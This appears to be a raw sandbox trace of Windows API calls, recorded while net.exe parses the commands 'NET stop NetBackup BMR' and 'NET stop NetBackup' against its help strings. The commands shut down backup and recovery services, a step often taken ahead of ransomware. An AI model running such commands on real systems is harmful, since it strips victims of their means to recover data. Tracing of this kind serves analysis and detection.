dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x2a [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET STATISTICS\r\n[WORKS", _MaxCount=0x16) returned 14 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x15 [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x16) returned 19 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x58 [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET TIME\r\n\r\n[\\\\compute", _MaxCount=0x16) returned -1 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x184 [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET USE\r\n[devicename |", _MaxCount=0x16) returned -2 [0100.331] LocalFree (hMem=0x589510) returned 0x0 [0100.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0xc7 [0100.331] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET USER\r\n[username [p", _MaxCount=0x16) returned -2 [0100.332] LocalFree (hMem=0x589510) returned 0x0 [0100.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x47 [0100.332] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET VIEW\r\n[\\\\computern", _MaxCount=0x16) returned -3 [0100.332] LocalFree (hMem=0x589510) returned 0x0 [0100.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0xc2 [0100.332] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NET\r\n [ ACCOUNTS | ", _MaxCount=0x16) returned 19 [0100.332] LocalFree (hMem=0x589510) returned 0x0 [0100.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x319 [0100.332] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="SERVICES\r\nNET START ca", _MaxCount=0x16) returned -5 [0100.332] LocalFree (hMem=0x589510) returned 0x0 [0100.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x483 [0100.332] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="SYNTAX\r\nThe following ", _MaxCount=0x16) returned -5 [0100.332] LocalFree (hMem=0x589510) returned 0x0 [0100.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0xa86 [0100.332] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="NAMES\r\nThe following t", _MaxCount=0x16) returned 4 [0100.332] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x54 [0100.333] _wcsnicmp (_String1="NET stop NetBackup BMR", _String2="\r\nFor more information", _MaxCount=0x16) returned 97 [0100.333] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0xad [0100.333] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0100.333] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x2e [0100.333] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0100.333] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x7d [0100.333] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0100.333] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x26 [0100.333] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0100.333] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x19 [0100.333] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0100.333] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x1b [0100.333] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0100.333] LocalFree (hMem=0x589510) returned 0x0 [0100.333] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0xbe [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x33 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x19 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0xc1 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x16 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x33 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x234 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x13 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0100.334] LocalFree (hMem=0x589510) returned 0x0 [0100.334] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x14 [0100.334] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x589510) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x14 [0100.335] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x589510) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x15 [0100.335] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x589510) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x15 [0100.335] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x589510) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="锐X⡋盺縷\x14锐X\x14") returned 0x16 [0100.335] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x589510) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="䰘X⡋盺縷\x14锐X\x14") returned 0x11 [0100.335] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x584c18) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14䰘X\x14") returned 0x14 [0100.335] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x58b510) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x12 [0100.335] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0100.335] LocalFree (hMem=0x58b510) returned 0x0 [0100.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xf [0100.336] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0100.336] LocalFree (hMem=0x58b510) returned 0x0 [0100.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x17 [0100.336] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0100.336] LocalFree (hMem=0x58b510) returned 0x0 [0100.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x18 [0100.336] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0100.511] LocalFree (hMem=0x58b510) returned 0x0 [0100.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x2a [0100.511] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x15 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x58 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x184 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xc7 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x47 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xc2 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x319 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x483 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xa86 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0100.512] LocalFree (hMem=0x58b510) returned 0x0 [0100.512] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x54 [0100.512] _wcsnicmp (_String1="NET stop NetBackup", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xad [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x2e [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x7d [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x26 [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x19 [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x1b [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xbe [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x33 [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x19 [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0xc1 [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x16 [0100.513] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0100.513] LocalFree (hMem=0x58b510) returned 0x0 [0100.513] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x33 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x234 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x13 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x14 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x14 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x15 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x15 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14딐X\x14") returned 0x16 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="䰘X⡋盺縷\x14딐X\x14") returned 0x11 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x584c18) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, Arguments=0x14f894 | out: lpBuffer="딐X⡋盺縷\x14䰘X\x14") returned 0x14 [0100.514] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0100.514] LocalFree (hMem=0x58b510) returned 0x0 [0100.514] FormatMessageW (in: dwFlags=0x1900, lpSource=0x71240000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f898, nSize=0x0, 